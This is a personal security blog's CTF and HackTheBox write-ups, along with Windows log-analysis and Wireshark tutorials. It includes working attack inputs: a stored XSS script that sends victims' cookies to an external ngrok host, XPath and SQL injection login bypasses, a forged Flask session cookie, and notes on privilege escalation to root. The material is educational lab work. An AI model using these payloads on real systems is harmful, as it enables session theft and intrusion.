next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\nweb category\nGraph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 {__schema{types{name,fields{name}}}} You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . It was base64 encoded , so we decode it to get the flag\nX marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1 SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 \u0026#39;or 1=1 or\u0026#39; this is able to bypass login and i get the result\n1 {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;} to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 \u0026#39;or position()=3 or\u0026#39; by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;} secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;} We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\nforensics category\nSnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\nSniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\nSnifferDog3 What version of Jenkins is running on 192.168.56.103? shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\nSnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n2. chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7 Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3} Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/ You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\nIdoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo \u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } } it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\nBlank This challenge tested knowledge is sql.\n1 2 db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; { as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); } THe username had to be \u0026ldquo;admin\u0026rdquo;. so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5 if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;); Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image() you also have to run the following command to set the exit data\n1 2 exiftool -PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\nLogin This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34; Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1 How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\nWhat is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\nWhich city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\nHow many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\nWhat is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\nWhat machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\nWhat is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\nWhat was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. The MAC address is on the blue line I have highlighted:\nWhat email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\nDEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\nThe above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. Read more here\nwe can use this sql statement to get the blob\n1 2 select data from blobber where id=238 Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\nninety one In this challenge you are provided with an encoded string\n1 @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2 flag{dfb88c7d9ca38e71dc27e1072fc43d1b} glasses This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 flag{8084e4530cf649814456f2a291eb81e9} web category starwars In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt; the flag will be returned in base64 format. Use it in the browser to access /admin page and the flag\nmisc category zombies In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 adb install jninjaspeak.apk Decompile the application using apktool\n1 2 use : apktool -r -s d jninjaspeak.apk We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\nFortune teller For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\nwheres waldo In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute(); the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import requests def calculate_distance(latitude, longitude): url = f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move() The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9 final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 open port 22 open port 50015 a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34; I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]} I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13 +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+ We can login to ssh as the user sau. The we read user.txt\nI uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\nREFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\nLooking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34; As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34; We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access denied and then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown 